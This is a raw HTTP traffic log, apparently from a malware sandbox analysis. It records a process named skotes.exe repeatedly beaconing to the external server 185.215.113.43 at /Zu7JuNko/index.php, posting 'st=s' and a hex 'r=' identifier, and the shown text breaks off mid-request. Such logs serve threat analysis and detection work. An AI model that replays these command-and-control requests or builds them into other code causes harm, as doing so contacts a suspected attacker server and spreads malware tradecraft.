                                                                                                                                                                                                                                                Dec 13, 2024 13:56:30.146529913 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:29 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                97192.168.2.450539185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:31.895389080 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:33.253201962 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                98192.168.2.450540185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:34.889257908 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:36.330820084 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:36 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                99192.168.2.450541185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:38.069797039 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:39.583715916 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:39 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                100192.168.2.450542185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:41.225013971 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:42.595413923 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:42 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                101192.168.2.450543185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:44.342350006 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:45.696351051 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:45 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                102192.168.2.450544185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:47.321732998 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:48.686311007 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:48 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                103192.168.2.450545185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:50.438955069 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:51.807440042 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:51 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                104192.168.2.450546185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:53.438128948 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:54.838793039 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                105192.168.2.450547185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:56.597022057 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:57.983000040 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:57 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                106192.168.2.450548185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:59.618033886 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:00.969429016 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:00 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                107192.168.2.450549185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:02.714473009 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:04.060710907 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:03 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                108192.168.2.450550185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:05.690934896 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:07.055074930 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:06 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                109192.168.2.450551185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:08.791356087 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:10.148140907 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:09 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                110192.168.2.450552185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:11.792263031 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:13.143932104 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:12 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                111192.168.2.450553185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:14.890619993 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:16.238980055 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:16 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                112192.168.2.450554185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:17.868029118 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:19.242047071 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:57:19 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                113192.168.2.450555185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:57:20.986867905 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
